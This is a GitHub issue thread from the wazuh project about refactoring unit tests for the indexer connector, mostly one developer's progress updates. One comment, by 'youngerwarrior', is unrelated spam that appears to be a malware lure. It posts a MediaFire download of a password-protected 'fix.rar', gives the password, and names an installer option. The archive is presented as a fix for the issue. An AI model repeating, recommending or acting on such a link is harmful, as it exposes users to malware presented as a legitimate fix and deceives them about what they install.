### ISSUE TITLE
Refactor indexer connector's unit tests

### ISSUE THREAD

**Issue by Dwordcito** [wazuh/wazuh#25415]
## Description
This issue aims to refactor the monitoring tests to mock efficiently the HTTPRequest avoiding testing of the connections or some out-of-scope class/library. In addition to this, the refactor of server selector tests will inject a mock of the Monitor class to test the conditions and granularity of this class.

### Expected
- Reimplement monitoring_test.cpp
- Reimplement serverSelector_test.cpp
- Remove the fakeOpenSearchServer.hpp file.

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by GabrielEValenzuela** [comment]
# Update

- Configuring and re-design solution.

**Comment by GabrielEValenzuela** [comment]
# Update

- Designing Mocks.

**Comment by GabrielEValenzuela** [comment]
# Update

- Working in refactor. Template the class to create mock and trampoline

**Comment by GabrielEValenzuela** [comment]
# Update

- Working in refactor. Soft block because the new structure of the `CMakeLitsts`

**Comment by GabrielEValenzuela** [comment]
# Update

- Task done. Await review.

**Comment by GabrielEValenzuela** [comment]
# Update

- Make changes of test case and document improvement.

**Comment by GabrielEValenzuela** [comment]
# Update

- Unable to compile locally due https://github.com/HowardHinnant/date/issues/836, but changes made and pushed.
- Rebase done.

**Comment by GabrielEValenzuela** [comment]
# Update

- Unable to compile due CMake error

**Comment by GabrielEValenzuela** [comment]
# Update

- Fixed compile errors
